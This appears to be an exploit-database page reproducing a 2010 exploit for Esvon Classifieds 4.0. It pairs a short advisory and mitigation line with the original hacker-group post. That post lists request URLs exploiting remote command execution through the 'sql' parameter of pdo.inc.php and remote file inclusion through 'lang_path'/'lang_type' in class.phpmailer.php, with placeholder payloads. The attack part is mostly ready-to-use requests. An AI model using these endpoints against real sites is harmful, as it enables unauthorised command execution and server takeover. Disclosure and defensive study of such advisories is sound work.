header-logo
Suggest Exploit
vendor:
Esvon Classifieds
by:
Sn!pEr.S!Te Hacker
7,5
CVSS
HIGH
Remote Command Execution and Remote File Inclusion
78, 94
CWE
Product Name: Esvon Classifieds
Affected Version From: 4.0
Affected Version To: 4.0
Patch Exists: NO
Related CWE: N/A
CPE: a:esvon:esvon_classifieds:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Remote Command Execution Vulnerability and Remote File Inclusion Vulnerability

Esvon Classifieds (pdo.inc.php) and (class.phpmailer.php) are vulnerable to Remote Command Execution and Remote File Inclusion. An attacker can exploit this vulnerability by sending a maliciously crafted URL to the vulnerable server. The URL should contain the malicious code in the 'sql' parameter for Remote Command Execution and the 'lang_path' parameter for Remote File Inclusion.

Mitigation:

The best way to mitigate this vulnerability is to ensure that user input is properly sanitized and validated before being used in any SQL query or file inclusion.
Source

Exploit-DB raw data:

1 ########################################## 1
0 I'm Sn!pEr.S!Te Hacker member from Inj3ct0r Team 1
1 ########################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

# ------------------------------------------------------------------------------
# Remote Command Execution Vulnerability and Remote File Inclusion Vulnerability 
# ------------------------------------------------------------------------------
# Esvon Classifieds ( pdo.inc.php ) (class.phpmailer.php )
--------------------------------------------------------------
# [+] Author : Sn!pEr.S!Te Hacker
# [+] Email : Sniper-site@HoTmaiL.Com
# [+] Inj3ct0r Team Hacker #
# [+] 27-8-2010
#  [+] Script : Programs » Esvon Classifieds#  
# [+]Version: [4.0] # 
# [+] Download:http://www.esvon.com/products/esvon_cl_3_0_demo.zip
 ---------------------------------------------------------------
-=[ exploit ]=-

command:

http://localhost/esvon_cl_3_0_demo/inc/pdo.inc.php?sql= [inj3ct0r command] 
  
http://127.0.0.1/esvon_cl_3_0_demo/inc/pdo.inc.php?sql= [inj3ct0r command]
----------------------------------------------------------------------

File inclusion :

http://localhost/esvon_cl_3_0_demo/inc/class.phpmailer.php?lang_path=[inj3ct0r RFI]
  
http://127.0.0.1/esvon_cl_3_0_demo/inc/class.phpmailer.php?lang_type=[inj3ct0r RFI]

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Thanks To All: www.Exploit-db.com | wwww.inj3ct0r.com | www.hack0wn.com

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
================== Greetz ==================================================
SeeMe ; Inj3ctOr ; Sid3^effects ; L0rd CrusAd3r ;indoushka ; The_Exploited

===========================all my friend ===================================
* PrX Hacker * Hacker Boy * AbUbAdR * mAsH3L ALLiL * DMaR AL-TMiMi |
* Sm Hacker * Dj Hacker * KaSpEr NaJd * Viros RooT *HaNniBaL KsA   |

Navigation

Suggest Exploit

Services By CQR